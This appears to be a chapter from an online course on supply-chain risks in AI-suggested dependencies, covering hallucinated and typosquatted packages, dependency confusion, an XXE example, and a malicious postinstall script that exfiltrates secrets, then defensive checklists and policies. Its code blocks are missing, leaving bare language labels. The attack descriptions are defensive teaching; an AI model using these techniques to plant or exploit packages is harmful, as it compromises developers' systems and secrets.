AI coding assistants are remarkably good at solving dependency problems. Need to parse JSON? It suggests a library. Need to handle dates? It recommends a package. Building a REST API? It scaffolds an entire framework setup.
But here's the problem: AI assistants don't verify that the packages they recommend are safe, maintained, or even real.
They're trained on vast amounts of code from the internet, including outdated tutorials, abandoned projects, and even malicious repositories. When an AI suggests a dependency, it's making a statistical prediction based on patterns it's seen, not conducting a security audit.
This creates a new attack surface: supply chain poisoning through AI-suggested dependencies.
Modern software development is built on dependencies. A typical web application doesn't have hundreds of dependencies — it has thousands. Every npm install, pip install, or cargo add pulls code written by strangers into your application, often with full access to your system.
The scale is staggering:
npm install express typically brings in dozens of packages.Recent attacks demonstrate the danger:
Now imagine an AI assistant that doesn't check whether packages are legitimate, actively maintained, or compromised. That's the environment we're operating in today.
AI coding assistants don't have real-time package registry access. They can't check:
Instead, they predict likely dependencies based on training data. This leads to several dangerous patterns:
1. Hallucinated Packages (That Don't Exist... Yet)
One of the most insidious risks is package hallucination — when an AI suggests a dependency that doesn't exist.
Example conversation:
Developer: "I need to validate credit card numbers in Python"
AI: "You can use the
credit-card-validatorpackage. Install it with:pip install credit-card-validator"
The problem? This package might not exist. But an attacker can create it.
This creates a supply chain attack vector:
This attack is already happening. Researchers have demonstrated it works 7:
Real incident: In 2024, security researchers found that GitHub Copilot and ChatGPT frequently suggested the package colourama (a typosquatting variant of the legitimate colorama) for Python projects. Attackers registered this package on PyPI with credential-stealing code. Thousands of developers installed it 8.
2. Outdated and Deprecated Packages
AI models are trained on historical code, which means they often suggest packages that were popular but are now:
Example — JavaScript date handling:
javascript
The problems:
moment.js is in maintenance mode — no new features, bug fixes only 9date-fns or native Intl.DateTimeFormat are betterBut the AI doesn't know this. Its training data includes millions of lines of code using Moment.js, so it keeps recommending it.
More concerning example — cryptography:
python
The pycrypto library has been abandoned since 2013 and has known security vulnerabilities 10. The modern replacement is pycryptodome, but AI tools trained on older code might not know that.
3. Vulnerable Packages with Known CVEs
AI assistants don't consult vulnerability databases. They might suggest a package that technically solves your problem but has critical security flaws.
Example:
javascript
The jsonwebtoken library has had multiple critical vulnerabilities over the years. An AI trained on code from 2020 might suggest a version with known exploits 11.
Another example — XML parsing:
python
The standard library XML parser in Python is vulnerable to several attacks 12. Security-conscious developers use defusedxml, but AI might not suggest it.
4. Malicious Typosquatting Packages
Attackers register packages with names similar to popular libraries, hoping developers will mistype the name. AI assistants can amplify this attack by:
colour vs color)Real examples of typosquatting packages found in the wild:
| Legitimate Package | Typosquat | Platform | Result |
|---|---|---|---|
requests | request | PyPI | Credential stealer |
urllib3 | urllib | PyPI | Backdoor |
numpy | numpay | PyPI | Cryptominer |
tensorflow | tensowflow | PyPI | Data exfiltration |
opencv-python | opencv | PyPI | Malware installer |
In 2023, a study found over 45,000 potentially malicious packages across npm, PyPI, and RubyGems using typosquatting, combosquatting, and brandjacking techniques 2.
How AI makes this worse:
python
The developer runs pip install request, which installs a malicious package instead of the legitimate requests library.
5. Dependency Confusion Attacks
This is a sophisticated supply chain attack where attackers exploit how package managers resolve dependencies:
How it works:
@acme/auth-utils)AI assistants can accidentally leak internal package names:
javascript
Now the AI knows your internal package naming convention. If that context is used to train future models or if an attacker sees this in a public repository, they can:
@acme/internal-auth on the public npm registryReal incident: In 2021, a security researcher demonstrated dependency confusion by publishing packages matching internal package names used by Apple, Microsoft, PayPal, and others. The packages were downloaded over 35,000 times before being removed 13.
6. Transitive Dependencies (The Hidden Threat)
When you install a package, you also install all of its dependencies, and all of their dependencies, recursively. This creates a massive, often invisible attack surface.
The risk: Even if express itself is trustworthy, any of those additional packages could be compromised. The event-stream attack happened through a transitive dependency — most developers didn't even know they were using it 3.
AI assistants don't understand transitive dependencies. When they suggest installing a package, they're not accounting for the hundreds of transitive dependencies it might pull in.
Let's walk through how these risks materialize in practice:
Setup:
express-jwt-auth (a hallucinated package)Attack:
express-jwt-authjavascript
npm install express-jwt-auth and integrates itDetection: This could go undetected for months because the authentication still works correctly. The malicious behavior is subtle and hidden.
Setup:
lxml in PythonWhat AI suggests:
python
The vulnerability:
This code is vulnerable to XML External Entity (XXE) attacks, which can lead to:
/etc/passwd or application secretsExploit example:
xml
When parsed with the AI-suggested code, this XML reads and returns the contents of /etc/passwd.
Safe version (which AI should have suggested):
python
Setup:
chartjs-helper (a popular but abandoned npm package)Attack:
package.json)javascript
npm install chartjs-helperpostinstall script runs automatically, exfiltrating secretsImpact:
.env files from developer machines exfiltratedThis is exactly what happened with the event-stream and UA-Parser-JS attacks 3 4.
Before installing any AI-suggested package, complete these checks:
| Step | Verification | Command/Tool | ✅ Safe | ❌ Reject |
|---|---|---|---|---|
| 1 | Package exists | npm info package-name | Shows valid metadata | Not found |
| 2 | Download volume | Check weekly downloads | >1,000/week | <1,000/week ⚠️ |
| 3 | Known vulnerabilities | npm audit or Snyk | No high/critical CVEs | High/Critical CVEs found |
| 4 | Active maintenance | Last publish date | Updated within 1 year | >1 year old ⚠️ |
| 5 | Dependency count | npm list --all | <50 total packages | >50 packages ⚠️ |
| 6 | Install scripts | Check package.json | None or benign | Suspicious scripts |
Decision Rules:
This 6-step checklist takes 2-3 minutes per package but prevents supply chain compromises.
Check package info:
bash
Scan for vulnerabilities:
bash
Also check:
Advanced verification tools:
bash
Examine before installing:
bash
package.jsonjson
Note: Legitimate packages rarely need install scripts. If present, read them carefully.
Here's how to protect your organization from AI-amplified supply chain risks:
1. Require Human Review for All New Dependencies
Policy:
Implementation:
yaml
2. Use Private Package Registries with Allowlists
Option 1: npm Enterprise / GitHub Packages
bash
Option 2: Artifactory / Nexus with Proxying
Option 3: Renovate/Dependabot with Approval Workflows
json
3. Implement Subresource Integrity (SRI) for CDN Assets
If AI suggests loading libraries from CDNs, always use SRI hashes.
Without SRI (vulnerable):
html
With SRI (protected):
html
If the CDN is compromised and delivers different code, the browser refuses to execute it.
4. Enable Dependency Pinning and Lock Files
Always commit lock files:
package-lock.json (npm)yarn.lock (Yarn)Pipfile.lock (Python/Pipenv)Gemfile.lock (Ruby)Cargo.lock (Rust)go.sum (Go)Use exact versions in production:
json
5. Scan Dependencies in CI/CD Pipeline
GitHub Actions example:
yaml
6. Monitor for Dependency Hijacking
Use services that alert you when:
7. Implement Software Bill of Materials (SBOM)
Generate an SBOM for every release:
bash
Store SBOMs alongside releases so you can:
Before accepting AI-suggested dependencies, verify the package exists on an official registry under the exact name you intend to use, is actively maintained, and links to a legitimate source repository. Scan for recent high‑severity CVEs, confirm the license is compatible, and prefer packages without install scripts or sprawling transitive trees.
Reject immediately when you see classic red flags: brandjacked or near‑miss names, brand‑new packages presented as “standard,” negligible downloads, empty or mismatched repositories, install steps that execute network scripts, or obfuscated source code.
When in doubt, pause for deeper review if maintenance looks stale, a single maintainer represents a clear bus factor, security issues are piling up, binaries ship in the repo, or the package requests unusual permissions or behaviors during installation.
Before moving to the next chapter, make sure you understand:
npm install[1] PyPI Stats – Python Package Index Statistics
[2] Socket Security Research – Supply Chain Attack Detection & Monitoring
[3] Snyk (2018) – Malicious code found in npm package event-stream
[4] TrueSec (2021) – UAParser.js npm Package Supply Chain Attack: Impact and Response
[5] BleepingComputer (2022) – PyTorch discloses malicious dependency chain compromise over holidays
[6] BleepingComputer (2023) – Ledger dApp supply chain attack steals $600K from crypto wallets
[7] Lasso Security (2023) – AI Hallucinations Package Risk
[8] Imperva (2024) – Python's Colorama Typosquatting Meets 'Fade Stealer' Malware
[9] Moment.js – Project Status: Maintenance Mode
[10] NVD – CVE-2013-7459: PyCrypto Hash Collision Vulnerability
[11] GitHub Advisory – CVE-2022-23529: jsonwebtoken vulnerable to signature validation bypass
[12] OWASP – XML External Entity (XXE) Processing
[13] Medium - Alex Birsan (2021) – Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Others
Mark this chapter as finished to continue
Mark this chapter as finished to continue